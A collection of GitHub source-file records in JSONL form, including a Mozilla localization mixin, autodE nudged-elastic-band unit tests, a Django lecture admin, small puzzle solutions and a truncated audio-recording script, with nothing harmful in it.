np.argmax(targets,axis=-1)\n if backend_library == 'sklearn':\n import sklearn.metrics as skm\n decisions = np.argmax(preds, axis=-1)\n for metric in metrics:\n m = getattr(skm, metric)\n m_signature = inspect.signature(m).parameters\n if labels is not None and 'labels' in m_signature:\n kwargs = {'labels': labels}\n else:\n kwargs = {}\n if 'y_pred' in m_signature:\n if 'average' in m_signature:\n for avg in ['micro','macro','weighted',None]:\n if avg == None:\n results[metric + '_perclass'] = m(targets, decisions, average=avg, **kwargs)\n else:\n results[metric+'_'+avg] = m(targets, decisions, average=avg, **kwargs)\n else:\n results[metric] = m(targets, decisions, **kwargs)\n else:\n if metric in ['roc_curve','roc_auc_score','average_precision_score','precision_recall_curve']:\n m_ = []\n for c in range(preds.shape[1]):\n targets_ = (targets == c).astype(np.int32)\n m_.append(m(targets_, preds[:,c], **kwargs))\n results[metric] = m_\n\n return results","repo_name":"mrpep/paips2","sub_path":"src/paips2/tasks/ml/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9037446830","text":"#!/usr/bin/env python\n# ***** BEGIN LICENSE BLOCK *****\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n# ***** END LICENSE BLOCK *****\n\"\"\"Localization.\n\"\"\"\n\nimport os\nfrom urlparse import urljoin\nimport sys\nfrom copy import deepcopy\n\nsys.path.insert(1, os.path.dirname(sys.path[0]))\n\nfrom mozharness.base.config import parse_config_file\nfrom mozharness.base.errors import PythonErrorList\nfrom mozharness.base.parallel import ChunkingMixin\n\n\n# LocalesMixin {{{1\nclass LocalesMixin(ChunkingMixin):\n def __init__(self, **kwargs):\n \"\"\" Mixins generally don't have an __init__.\n This breaks super().__init__() for children.\n However, this is needed to override the query_abs_dirs()\n \"\"\"\n self.abs_dirs = None\n self.locales = None\n self.gecko_locale_revisions = None\n self.l10n_revisions = {}\n\n def query_locales(self):\n if self.locales is not None:\n return self.locales\n c = self.config\n ignore_locales = c.get(\"ignore_locales\", [])\n additional_locales = c.get(\"additional_locales\", [])\n # List of locales can be set by using different methods in the\n # following order:\n # 1. \"locales\" buildbot property: a string of locale:revision separated\n # by space\n # 2. \"MOZ_LOCALES\" env variable: a string of locale:revision separated\n # by space\n # 3. self.config[\"locales\"] which can be either coming from the config\n # or from --locale command line argument\n # 4. using self.config[\"locales_file\"] l10n changesets file\n locales = None\n\n # Buildbot property\n if hasattr(self, 'read_buildbot_config'):\n self.read_buildbot_config()\n if self.buildbot_config:\n locales = self.buildbot_config['properties'].get(\"locales\")\n if locales:\n self.info(\"Using locales from buildbot: %s\" % locales)\n locales = locales.split()\n else:\n self.info(\"'read_buildbot_config()' is missing, ignoring buildbot\"\n \" properties\")\n\n # Environment variable\n if not locales and \"MOZ_LOCALES\" in os.environ:\n self.debug(\"Using locales from environment: %s\" %\n os.environ[\"MOZ_LOCALES\"])\n locales = os.environ[\"MOZ_LOCALES\"].split()\n\n # Command line or config\n if not locales and c.get(\"locales\", None):\n locales = c[\"locales\"]\n self.debug(\"Using locales from config/CLI: %s\" % locales)\n\n # parse locale:revision if set\n if locales:\n for l in locales:\n if \":\" in l:\n # revision specified in locale string\n locale, revision = l.split(\":\", 1)\n self.debug(\"Using %s:%s\" % (locale, revision))\n self.l10n_revisions[locale] = revision\n # clean up locale by removing revisions\n locales = [l.split(\":\")[0] for l in locales]\n\n if not locales and 'locales_file' in c:\n locales_file = os.path.join(c['base_work_dir'], c['work_dir'],\n c['locales_file'])\n locales = self.parse_locales_file(locales_file)\n\n if not locales:\n self.fatal(\"No locales set!\")\n\n for locale in ignore_locales:\n if locale in locales:\n self.debug(\"Ignoring locale %s.\" % locale)\n locales.remove(locale)\n if locale in self.l10n_revisions:\n del self.l10n_revisions[locale]\n\n for locale in additional_locales:\n if locale not in locales:\n self.debug(\"Adding locale %s.\" % locale)\n locales.append(locale)\n\n if not locales:\n return None\n if 'total_locale_chunks' and 'this_locale_chunk' in c:\n self.debug(\"Pre-chunking locale list: %s\" % str(locales))\n locales = self.query_chunked_list(locales,\n c['this_locale_chunk'],\n c['total_locale_chunks'],\n sort=True)\n self.debug(\"Post-chunking locale list: %s\" % locales)\n self.locales = locales\n return self.locales\n\n def list_locales(self):\n \"\"\" Stub action method.\n \"\"\"\n self.info(\"Locale list: %s\" % str(self.query_locales()))\n\n def parse_locales_file(self, locales_file):\n locales = []\n c = self.config\n platform = c.get(\"locales_platform\", None)\n\n if locales_file.endswith('json'):\n locales_json = parse_config_file(locales_file)\n for locale in locales_json.keys():\n if isinstance(locales_json[locale], dict):\n if platform and platform not in locales_json[locale]['platforms']:\n continue\n self.l10n_revisions[locale] = locales_json[locale]['revision']\n else:\n # some other way of getting this?\n self.l10n_revisions[locale] = 'default'\n locales.append(locale)\n else:\n locales = self.read_from_file(locales_file).split()\n return locales\n\n def run_compare_locales(self, locale, halt_on_failure=False):\n dirs = self.query_abs_dirs()\n env = self.query_l10n_env()\n python = self.query_exe('python2.7')\n compare_locales_error_list = list(PythonErrorList)\n self.rmtree(dirs['abs_merge_dir'])\n self.mkdir_p(dirs['abs_merge_dir'])\n command = [python, 'mach', 'compare-locales',\n '--merge-dir', dirs['abs_merge_dir'],\n '--l10n-ini', os.path.join(dirs['abs_locales_src_dir'], 'l10n.ini'),\n '--l10n-base', dirs['abs_l10n_dir'], locale]\n self.info(\"*** BEGIN compare-locales %s\" % locale)\n status = self.run_command(command,\n halt_on_failure=halt_on_failure,\n env=env,\n cwd=dirs['abs_mozilla_dir'],\n error_list=compare_locales_error_list)\n self.info(\"*** END compare-locales %s\" % locale)\n return status\n\n def query_abs_dirs(self):\n if self.abs_dirs:\n return self.abs_dirs\n abs_dirs = super(LocalesMixin, self).query_abs_dirs()\n c = self.config\n dirs = {}\n dirs['abs_work_dir'] = os.path.join(c['base_work_dir'],\n c['work_dir'])\n # TODO prettify this up later\n if 'l10n_dir' in c:\n dirs['abs_l10n_dir'] = os.path.join(dirs['abs_work_dir'],\n c['l10n_dir'])\n if 'mozilla_dir' in c:\n dirs['abs_mozilla_dir'] = os.path.join(dirs['abs_work_dir'],\n c['mozilla_dir'])\n dirs['abs_locales_src_dir'] = os.path.join(dirs['abs_mozilla_dir'],\n c['locales_dir'])\n dirs['abs_compare_locales_dir'] = os.path.join(dirs['abs_mozilla_dir'],\n 'python', 'compare-locales',\n 'compare_locales')\n else:\n # Use old-compare-locales if no mozilla_dir set, needed\n # for clobberer, and existing mozharness tests.\n dirs['abs_compare_locales_dir'] = os.path.join(dirs['abs_work_dir'],\n 'compare-locales')\n\n if 'objdir' in c:\n if os.path.isabs(c['objdir']):\n dirs['abs_objdir'] = c['objdir']\n else:\n dirs['abs_objdir'] = os.path.join(dirs['abs_mozilla_dir'],\n c['objdir'])\n dirs['abs_merge_dir'] = os.path.join(dirs['abs_objdir'],\n 'merged')\n dirs['abs_locales_dir'] = os.path.join(dirs['abs_objdir'],\n c['locales_dir'])\n\n for key in dirs.keys():\n if key not in abs_dirs:\n abs_dirs[key] = dirs[key]\n self.abs_dirs = abs_dirs\n return self.abs_dirs\n\n # This requires self to inherit a VCSMixin.\n def pull_locale_source(self, hg_l10n_base=None, parent_dir=None, vcs='hg'):\n c = self.config\n if not hg_l10n_base:\n hg_l10n_base = c['hg_l10n_base']\n if parent_dir is None:\n parent_dir = self.query_abs_dirs()['abs_l10n_dir']\n self.mkdir_p(parent_dir)\n repos = []\n replace_dict = {}\n # This block is to allow for pulling buildbot-configs in Fennec\n # release builds, since we don't pull it in MBF anymore.\n if c.get(\"l10n_repos\"):\n if c.get(\"user_repo_override\"):\n replace_dict['user_repo_override'] = c['user_repo_override']\n for repo_dict in deepcopy(c['l10n_repos']):\n repo_dict['repo'] = repo_dict['repo'] % replace_dict\n repos.append(repo_dict)\n else:\n repos = c.get(\"l10n_repos\")\n self.vcs_checkout_repos(repos, tag_override=c.get('tag_override'))\n # Pull locales\n locales = self.query_locales()\n locale_repos = []\n if c.get(\"user_repo_override\"):\n hg_l10n_base = hg_l10n_base % {\"user_repo_override\": c[\"user_repo_override\"]}\n for locale in locales:\n tag = c.get('hg_l10n_tag', 'default')\n if self.l10n_revisions.get(locale):\n tag = self.l10n_revisions[locale]\n locale_repos.append({\n 'repo': \"%s/%s\" % (hg_l10n_base, locale),\n 'branch': tag,\n 'vcs': vcs\n })\n revs = self.vcs_checkout_repos(repo_list=locale_repos,\n parent_dir=parent_dir,\n tag_override=c.get('tag_override'))\n self.gecko_locale_revisions = revs\n\n def query_l10n_repo(self):\n # Find the name of our repository\n mozilla_dir = self.config['mozilla_dir']\n repo = None\n for repository in self.config['repos']:\n if repository.get('dest') == mozilla_dir:\n repo = repository['repo']\n break\n return repo\n\n# GaiaLocalesMixin {{{1\nclass GaiaLocalesMixin(object):\n gaia_locale_revisions = None\n\n def pull_gaia_locale_source(self, l10n_config, locales, base_dir):\n root = l10n_config['root']\n # urljoin will strip the last part of root if it doesn't end with \"/\"\n if not root.endswith('/'):\n root = root + '/'\n vcs = l10n_config['vcs']\n env = l10n_config.get('env', {})\n repos = []\n for locale in locales:\n repos.append({\n 'repo': urljoin(root, locale),\n 'dest': locale,\n 'vcs': vcs,\n 'env': env,\n })\n self.gaia_locale_revisions = self.vcs_checkout_repos(repo_list=repos, parent_dir=base_dir)\n\n\n# __main__ {{{1\n\nif __name__ == '__main__':\n pass\n","repo_name":"mozilla/positron","sub_path":"testing/mozharness/mozharness/mozilla/l10n/locales.py","file_name":"locales.py","file_ext":"py","file_size_in_byte":11518,"program_lang":"python","lang":"en","doc_type":"code","stars":553,"dataset":"github-code","pt":"68"} +{"seq_id":"24952404122","text":"import json\n\ndef main():\n print(\"Room Create (capitilization only required on description and items)\")\n room = {}\n room['name'] = input('NAME: ').title()\n room[\"description\"] = input('\\nDescription:\\n\\t')\n print(\"ENTER NAME OF CONNECTING LOCATIONS OR BLANK FOR NONE\")\n room[\"north\"] = input('Room North: ').title()\n room[\"south\"] = input('Room South: ').title()\n room[\"east\"] = input('Room East: ').title()\n room[\"west\"] = input('Room West: ').title()\n room['npc'] = []\n room['items'] = []\n\n conv_direct(room,'north')\n conv_direct(room,'south')\n conv_direct(room,'east')\n conv_direct(room,'west')\n\n npcs = ''\n while not npcs.isdigit():\n try:\n npcs = input('how many npcs? ')\n except:\n continue\n for i in range(int(npcs)):\n room['npc'].append(input('Name of npc: '))\n\n items = ''\n while not items.isdigit():\n try:\n items = input('How many items? ')\n except:\n continue\n for i in range(int(items)):\n room['items'].append(input('name of item: '))\n\n for key, value in room.items():\n print(key, value)\n\n file = '..\\\\rooms\\\\' + room['name'] + '.json'\n with open(file, 'w') as f:\n save = json.dumps(room)\n f.write(save)\n\ndef conv_direct(room, direction):\n if room[direction] == '':\n room[direction] = None\n\nmain()\ninput()\n","repo_name":"ksmeeks0001/Text-Adventure-Generator","sub_path":"command_line_editer/json_room_create.py","file_name":"json_room_create.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"18228813613","text":"# 为了搞清楚a3c的实现方法,简单学习多线程,多核运算\nimport multiprocessing as mp\nimport threading as td\nimport time\nimport gym\nimport numpy as np\n\ndef job(q):\n res = 0\n for i in range(1000000):\n res += i + i**2 + i**3\n q.put(res) # queue\n\ndef multicore():\n q = mp.Queue()\n p1 = mp.Process(target=job, args=(q,))\n p2 = mp.Process(target=job, args=(q,))\n p1.start()\n p2.start()\n p1.join()\n p2.join()\n res1 = q.get()\n res2 = q.get()\n print('multicore:',res1 + res2)\n\ndef normal():\n res = 0\n for _ in range(2):\n for i in range(1000000):\n res += i + i**2 + i**3\n print('normal:', res)\n\n\ndef multithread():\n q = mp.Queue() # thread可放入process同样的queue中\n t1 = td.Thread(target=job, args=(q,))\n t2 = td.Thread(target=job, args=(q,))\n t1.start()\n t2.start()\n t1.join()\n t2.join()\n res1 = q.get()\n res2 = q.get()\n print('multithread:', res1 + res2)\n\ndef job1(x):\n return x*x\n\n\ndef multicore1():\n pool = mp.Pool(processes=10)\n res = pool.map(job1, range(10))\n print(res)\n\nclass Agent():\n def __init__(self,env=None):\n self.num_actions = env.action_space.n\n \n\ndef env1(env_name):\n env = gym.make(env_name)\n obs = env.reset()\n num_actions = env.action_space.n\n sum_r=0\n while True:\n action = np.random.choice(list(range(num_actions)))\n obs_,rew,done,info = env.step(action)\n print(env_name,\"reward\",rew)\n sum_r += rew\n if done:\n print(env_name,\"reward\",sum_r)\n break\n return sum_r\n\n\n\ndef multienv():\n num_env = mp.cpu_count()-20\n input_name = ['MsPacman-v0' for i in range(num_env)]\n pool = mp.Pool(processes=num_env)\n res = pool.map(env1,input_name)\n print(res)\n#MsPacman-v0\n\nif __name__ == '__main__':\n st = time.time()\n normal()\n st1 = time.time()\n print('normal time:', st1 - st)\n multithread()\n st2 = time.time()\n print('multithread time:', st2 - st1)\n multicore1()\n st3 = time.time()\n print('multicore time:', st3 - st2)\n multienv()\n","repo_name":"kangyongxin/GBMRcode","sub_path":"Base/multiprocessing_learning.py","file_name":"multiprocessing_learning.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70007964377","text":"import sys\n\nstacks = [[] for i in range(10)]\n\ndef add_crates(line):\n for i in range(len(line)):\n if line[i].isupper():\n stacks[i // 4].append(line[i])\n\n\ndef process_move(amt, src, dest):\n moved = []\n for i in range(amt):\n crate = stacks[src - 1].pop(0)\n moved.append(crate)\n \n moved.reverse()\n for move in moved:\n stacks[dest - 1].insert(0, move)\n\n\ndef process_line(line):\n words = line.split()\n process_move(int(words[1]), int(words[3]), int(words[5]))\n\nfirstPart = True\nfor line in sys.stdin:\n if firstPart:\n if len(line) < 2:\n firstPart = False\n else:\n add_crates(line[:-1])\n else:\n process_line(line[:-1])\n\nfor s in stacks:\n if len(s) > 0:\n print(s[0], end=\"\")\nprint()\n\n","repo_name":"IanFinlayson/advent-of-code-2022","sub_path":"05/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29404959304","text":"from django.utils.translation import ugettext_lazy as _\nfrom django.contrib import admin\nfrom reversion.admin import VersionAdmin\nfrom lecture.models import Lecture, LectureSchedule, LectureApplication\n\n\nclass InlineScheduleAdmin(admin.TabularInline):\n model = LectureSchedule\n fieldsets = (\n ('', {\n 'fields': ('start_time', 'end_time', 'day_of_week',)\n }),\n )\n\n\n@admin.register(Lecture)\nclass LectureAdmin(VersionAdmin):\n list_display = (\n 'pk', 'name', 'lecturer', 'classroom', 'start_date', 'end_date',\n 'is_registration_open', 'external_registration_url', 'created_at',\n )\n list_filter = (\n 'classroom', ('lecturer', admin.RelatedOnlyFieldListFilter),\n 'is_registration_open', 'start_date', 'created_at',\n )\n fieldsets = (\n (_('Lecture Information'), {\n 'fields': (\n 'name', 'description', 'poster', 'lecturer',\n ('classroom', 'is_registration_open'), 'external_registration_url'\n )\n }),\n (_('Dates'), {\n 'fields': (('start_date', 'end_date'),)\n }),\n (_('Stamps'), {\n 'fields': (('created_at', 'updated_at'),)\n }),\n )\n readonly_fields = ('created_at', 'updated_at')\n search_fields = ('name', 'classroom', 'lecturer')\n inlines = [\n InlineScheduleAdmin\n ]\n\n\n@admin.register(LectureSchedule)\nclass LectureScheduleAdmin(VersionAdmin):\n list_display = ('pk', 'lecture', 'start_time', 'end_time', 'day_of_week',)\n list_filter = ()\n fieldsets = (\n ('', {'fields': ('lecture', ('start_time', 'end_time', 'day_of_week'),)}),\n )\n\n\n@admin.register(LectureApplication)\nclass LectureApplicationAdmin(VersionAdmin):\n list_display = ('pk', 'lecture', 'user', 'is_approved', 'created_at',)\n list_filter = (('lecture', admin.RelatedOnlyFieldListFilter), 'is_approved',)\n fieldsets = (\n (_('Application'), {\n 'fields': (('lecture', 'user'), 'is_approved',)\n }),\n (_('Stamps'), {\n 'fields': (('created_at',),)\n }),\n )\n search_fields = ('user__email', 'user__first_name', 'user__last_name',)\n readonly_fields = ('created_at',)\n","repo_name":"itugnu/website","sub_path":"lecture/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"68"} +{"seq_id":"27742800300","text":"import shutil\nimport os\nimport numpy as np\nimport pytest\nfrom autode.path import Path\nfrom autode.neb import NEB\nfrom autode.values import Distance, ForceConstant\nfrom autode.neb.ci import Images, CImages, Image\nfrom autode.neb.idpp import IDPP\nfrom autode.species.molecule import Species, Molecule\nfrom autode.species.molecule import Reactant\nfrom autode.neb.neb import get_ts_guess_neb\nfrom autode.neb.original import energy_gradient\nfrom autode.atoms import Atom\nfrom autode.geom import are_coords_reasonable\nfrom autode.input_output import xyz_file_to_atoms\nfrom autode.utils import work_in_tmp_dir\nfrom autode.methods import XTB, ORCA\nfrom . import testutils\n\n\nhere = os.path.dirname(os.path.abspath(__file__))\n\n\n@work_in_tmp_dir()\ndef test_neb_properties():\n # H-H H\n reac = Species(\n name=\"reac\",\n charge=0,\n mult=2,\n atoms=[Atom(\"H\"), Atom(\"H\", x=0.7), Atom(\"H\", x=2.0)],\n )\n # H H-H\n prod = Species(\n name=\"prod\",\n charge=0,\n mult=2,\n atoms=[Atom(\"H\"), Atom(\"H\", x=1.3), Atom(\"H\", x=2.0)],\n )\n\n neb = NEB.from_end_points(reac, prod, num=3)\n assert len(neb.images) == 3\n assert neb.peak_species is None\n assert not neb.images.contains_peak\n\n # Should move monotonically from 0.7 -> 1.3 Angstroms\n for i in range(1, len(neb.images)):\n prev_bb_dist = neb.images[i - 1].distance(0, 1)\n curr_bb_dist = neb.images[i].distance(0, 1)\n\n assert curr_bb_dist > prev_bb_dist\n\n\ndef test_image_properties():\n k = ForceConstant(0.1)\n images = CImages(images=Images(init_k=k))\n assert images != 0\n assert images == images\n\n images = Images(init_k=k)\n assert images != 0\n assert images == images\n\n image = Image(Molecule(smiles=\"CC\"), k=ForceConstant(1.0), name=\"tmp\")\n with pytest.raises(Exception):\n image._generate_conformers()\n\n\ndef test_contains_peak():\n species_list = Path()\n for i in range(5):\n h2 = Species(\n name=\"h2\", charge=0, mult=2, atoms=[Atom(\"H\"), Atom(\"H\", x=0)]\n )\n\n h2.energy = i\n species_list.append(h2)\n\n assert not species_list.contains_peak\n\n species_list[2].energy = 5\n assert species_list.contains_peak\n\n species_list[2].energies.clear()\n species_list[2].energy = None\n assert not species_list.contains_peak\n\n\n@testutils.requires_working_xtb_install\n@testutils.work_in_zipped_dir(os.path.join(here, \"data\", \"neb.zip\"))\ndef test_full_calc_with_xtb():\n sn2_neb = NEB.from_end_points(\n initial=Species(\n name=\"inital\",\n charge=-1,\n mult=1,\n atoms=xyz_file_to_atoms(\"sn2_init.xyz\"),\n solvent_name=\"water\",\n ),\n final=Species(\n name=\"final\",\n charge=-1,\n mult=1,\n atoms=xyz_file_to_atoms(\"sn2_final.xyz\"),\n solvent_name=\"water\",\n ),\n num=14,\n )\n\n sn2_neb.calculate(method=XTB(), n_cores=2)\n\n # There should be a peak in this surface\n assert sn2_neb.peak_species is not None\n\n assert all(image.energy is not None for image in sn2_neb.images)\n\n energies = [image.energy for image in sn2_neb.images]\n path_energy = sum(energy - min(energies) for energy in energies)\n\n assert 0.25 < path_energy < 0.45\n\n\n@testutils.requires_working_xtb_install\n@testutils.work_in_zipped_dir(os.path.join(here, \"data\", \"neb.zip\"))\ndef test_get_ts_guess_neb():\n reactant = Reactant(\n name=\"inital\",\n charge=-1,\n mult=1,\n solvent_name=\"water\",\n atoms=xyz_file_to_atoms(\"sn2_init.xyz\"),\n )\n\n product = Reactant(\n name=\"final\",\n charge=-1,\n mult=1,\n solvent_name=\"water\",\n atoms=xyz_file_to_atoms(\"sn2_final.xyz\"),\n )\n\n xtb = XTB()\n xtb.path = shutil.which(\"xtb\")\n\n ts_guess = get_ts_guess_neb(reactant, product, method=xtb, n=10)\n\n assert ts_guess is not None\n # Approximate distances at the TS guess\n assert 1.8 < ts_guess.distance(0, 2) < 2.3 # C-F\n assert 2.1 < ts_guess.distance(2, 1) < 2.6 # C-Cl\n\n if os.path.exists(\"NEB\"):\n shutil.rmtree(\"NEB\")\n\n if os.path.exists(\"neb.xyz\"):\n os.remove(\"neb.xyz\")\n\n # Trying to get a TS guess with an unavailable method should return None\n # as a TS guess\n orca = ORCA()\n orca.path = None\n\n orca_ts_guess = get_ts_guess_neb(reactant, product, method=orca, n=10)\n assert orca_ts_guess is None\n\n\ndef test_climbing_image():\n k = ForceConstant(0.1)\n images = CImages(images=Images(init_k=k))\n images.append_species(Molecule(atoms=[Atom(\"H\")], mult=2))\n\n assert images.peak_idx is None\n assert images[0].iteration == 0\n images[0].iteration = 10\n\n\ndef _simple_h2_images(num, shift, increment):\n \"\"\"Simple set of images for a n-image NEB for H2\"\"\"\n\n images = Images(init_k=ForceConstant(1.0))\n\n for i in range(num):\n mol = Molecule(atoms=[Atom(\"H\"), Atom(\"H\", x=shift + i * increment)])\n images.append_species(mol)\n\n return images\n\n\ndef test_energy_gradient_type():\n k = ForceConstant(1.0)\n image = Image(species=Molecule(atoms=[Atom(\"H\")], mult=2), name=\"tmp\", k=k)\n\n # Energy and gradient must have a method (EST or IDPP)\n with pytest.raises(ValueError):\n _ = energy_gradient(image=image, method=None, n_cores=1)\n\n\ndef test_iddp_init():\n \"\"\"IDPP requires at least 2 images\"\"\"\n\n k = ForceConstant(0.1)\n\n with pytest.raises(ValueError):\n _ = IDPP(Images(init_k=k))\n\n with pytest.raises(ValueError):\n _ = IDPP(Images(init_k=k))\n\n\ndef test_iddp_energy():\n images = _simple_h2_images(num=3, shift=0.5, increment=0.1)\n idpp = IDPP(images)\n\n # Should be callable to evaluate the objective function\n value = idpp(images[1])\n\n assert value is not None\n assert np.isclose(\n value,\n # w r_k r\n 0.6 ** (-4) * ((0.5 + 2 * 0.2 / 3) - 0.6) ** 2,\n atol=1e-5,\n )\n\n\ndef test_iddp_gradient():\n images = _simple_h2_images(num=3, shift=0.5, increment=0.1)\n image = images[1]\n idpp = IDPP(images)\n\n value = idpp(image)\n\n # and the gradient calculable\n grad = idpp.grad(image).flatten()\n assert grad is not None\n\n # And the gradient be close to the numerical analogue\n def num_grad(n, h=1e-8):\n i, k = n // 3, n % 3\n\n shift_vec = np.zeros(3)\n shift_vec[k] = h\n\n image.atoms[i].translate(shift_vec)\n new_value = idpp(image)\n image.atoms[i].translate(-shift_vec)\n\n return (new_value - value) / h\n\n # Numerical gradient should be finite\n assert not np.isclose(num_grad(0), 0.0, atol=1e-10)\n\n # Check all the elements in the gradient vector\n for i, analytic_value in enumerate(grad):\n assert np.isclose(analytic_value, num_grad(i), atol=1e-5)\n\n\n@work_in_tmp_dir()\ndef test_neb_interpolate_and_idpp_relax():\n mol = Molecule(\n name=\"methane\",\n atoms=[\n Atom(\"C\", -0.91668, 0.42765, 0.00000),\n Atom(\"H\", 0.15332, 0.42765, 0.00000),\n Atom(\"H\", -1.27334, 0.01569, -0.92086),\n Atom(\"H\", -1.27334, 1.43112, 0.10366),\n Atom(\"H\", -1.27334, -0.16385, 0.81720),\n ],\n )\n\n rot_mol = mol.copy()\n rot_mol.rotate(axis=[1.0, 0.0, 0.0], theta=1.5)\n\n neb = NEB.from_end_points(initial=mol, final=rot_mol, num=10)\n\n for image in neb.images:\n assert are_coords_reasonable(image.coordinates)\n\n\ndef test_max_delta_between_images():\n _list = [\n Molecule(atoms=[Atom(\"H\"), Atom(\"H\", x=2.7)]),\n Molecule(atoms=[Atom(\"H\"), Atom(\"H\", x=1.7)]),\n ]\n\n assert np.isclose(\n NEB.from_list(_list).max_atom_distance_between_images, 1.0\n )\n\n _list[0].atoms[1].coord[0] = 1.7 # x coordinate of the second atom\n assert np.isclose(\n NEB.from_list(_list).max_atom_distance_between_images, 0.0\n )\n\n\ndef test_max_delta_between_images_h3():\n _list = [\n Molecule(atoms=[Atom(\"H\"), Atom(\"H\", x=0.7), Atom(\"H\", x=2.7)]),\n Molecule(atoms=[Atom(\"H\"), Atom(\"H\", x=0.70657), Atom(\"H\", x=2.7)]),\n ]\n\n neb = NEB.from_list(_list)\n assert np.isclose(neb.max_atom_distance_between_images, 0.00657)\n\n assert np.isclose(\n neb.max_atom_distance_between_images,\n neb._max_atom_distance_between_images([0, 1]),\n )\n\n\ndef test_partition_max_delta():\n # Set of molecules that are like: [H-H...H, H--H--H, H...H-H]\n _list = [\n Molecule(atoms=[Atom(\"H\"), Atom(\"H\", x=0.7), Atom(\"H\", x=2.7)]),\n Molecule(atoms=[Atom(\"H\"), Atom(\"H\", x=1.35), Atom(\"H\", x=2.7)]),\n Molecule(atoms=[Atom(\"H\"), Atom(\"H\", x=2.0), Atom(\"H\", x=2.7)]),\n ]\n\n h2_h = NEB.from_list(_list)\n max_delta = Distance(0.1, units=\"Å\")\n\n assert (\n np.max(\n np.linalg.norm(_list[0].coordinates - _list[1].coordinates, axis=1)\n )\n > max_delta\n )\n\n h2_h.partition(max_delta=max_delta)\n\n for i, j in [(0, 1), (1, 2)]:\n assert (\n np.max(\n np.linalg.norm(\n h2_h.images[i].coordinates - h2_h.images[j].coordinates,\n axis=1,\n )\n )\n <= max_delta\n )\n\n\ndef _h_xyz_string_with_energy(energy: float):\n return f\"1\\nE = {energy:.6f}\\nH 0.0 0.0 0.0\"\n\n\ndef _h_xyz_string():\n return f\"1\\ntitle line\\nH 0.0 0.0 0.0\"\n\n\n@work_in_tmp_dir()\ndef test_init_from_file_sets_force_constant():\n with open(\"tmp.xyz\", \"w\") as file:\n print(\n _h_xyz_string_with_energy(0.1),\n _h_xyz_string_with_energy(0.1015),\n _h_xyz_string_with_energy(0.105),\n sep=\"\\n\",\n file=file,\n )\n\n # Should be able to set the initial force constant\n neb = NEB.from_file(\"tmp.xyz\", init_k=0.234)\n assert len(neb.images) == 3\n assert np.isclose(neb.init_k, 0.234)\n\n neb = NEB.from_file(\"tmp.xyz\")\n # Estimated value should be reasonable\n k_1kcal_diffs = neb.init_k\n assert 0.001 < neb.init_k < 0.2\n\n with open(\"tmp.xyz\", \"w\") as file:\n print(\n _h_xyz_string_with_energy(0.1),\n _h_xyz_string_with_energy(0.25),\n _h_xyz_string_with_energy(0.4),\n sep=\"\\n\",\n file=file,\n )\n\n # with larger energy differences we should have a larger k\n assert NEB.from_file(\"tmp.xyz\").init_k > k_1kcal_diffs\n\n\n@work_in_tmp_dir()\ndef test_init_from_file_sets_force_constant_no_energies():\n with open(\"tmp.xyz\", \"w\") as file:\n print(_h_xyz_string(), _h_xyz_string(), sep=\"\\n\", file=file)\n\n neb = NEB.from_file(\"tmp.xyz\")\n # Estimated value should be reasonable even without energies\n assert 0.001 < neb.init_k < 0.2\n\n\ndef test_neb_constructor_with_kwargs_raises():\n with pytest.raises(Exception):\n _ = NEB(init_k=ForceConstant(0.1), another_arg=\"a string\")\n\n\ndef test_constructing_neb_from_endpoints_with_different_atoms_raises():\n with pytest.raises(Exception):\n _ = NEB.from_end_points(\n Molecule(smiles=\"O\"), Molecule(smiles=\"C\"), num=4\n )\n\n\ndef test_neb_from_endpoints_requires_at_least_2_images():\n with pytest.raises(Exception):\n _ = NEB.from_end_points(\n Molecule(smiles=r\"C\\C=C\\C\"), Molecule(smiles=r\"C\\C=C/C\"), num=1\n )\n\n\n@testutils.requires_working_xtb_install\n@work_in_tmp_dir()\ndef test_neb_ts_guess_is_none_if_no_peak():\n init = Molecule(smiles=\"C\")\n final = init.copy()\n final.rotate(axis=[0.1, 0.2, 0.3], theta=0.4)\n\n result = get_ts_guess_neb(init, final, method=XTB(), n=3)\n assert result is None\n","repo_name":"duartegroup/autodE","sub_path":"tests/test_neb.py","file_name":"test_neb.py","file_ext":"py","file_size_in_byte":11579,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"68"} +{"seq_id":"6922006674","text":"#https://www.hackerrank.com/challenges/time-conversion/problem\n\n#!/bin/python3\n\nimport os\nimport sys\n\n#\n# Complete the timeConversion function below.\n#\ndef timeConversion(s):\n #\n # Write your code here.\n #\n h=0\n if s[-2]=='A' and s[0:2]=='12':\n s='00'+s[2:]\n if s[-2]=='P' and s[0:2]=='12':\n return '12'+s[2:-2]\n if s[-2]=='P':\n h=int(s[0:2])+12\n if h>=24:\n h-=24\n s='0'+h+s[2:-2]\n else:\n s=str(h)+s[2:-2]\n else:\n s=s[0:-2]\n return s\n \n\nif __name__ == '__main__':\n f = open(os.environ['OUTPUT_PATH'], 'w')\n\n s = input()\n\n result = timeConversion(s)\n\n f.write(result + '\\n')\n\n f.close()\n","repo_name":"cddedric/Hackerrank-solutions","sub_path":"Python/time_conversion.py","file_name":"time_conversion.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"13966180494","text":"import pyaudio, wave, sys\r\n\r\ndef saveAudio(filename):\r\n # all the basic information to get audio file\r\n CHUNK = 1024\r\n FORMAT = pyaudio.paInt16\r\n CHANNELS = 1\r\n RATE = 44100\r\n\r\n # getting the audio from the speaker\r\n p = pyaudio.PyAudio()\r\n for i in range(0, p.get_device_count()):\r\n if \"Stero Mix\" in p.get_device_info_by_index(i)['name']: device_index = i\r\n else: device_index = 1\r\n\r\n # opening the stream to start listening\r\n stream = p.open(format = FORMAT,\r\n rate = RATE,\r\n input = 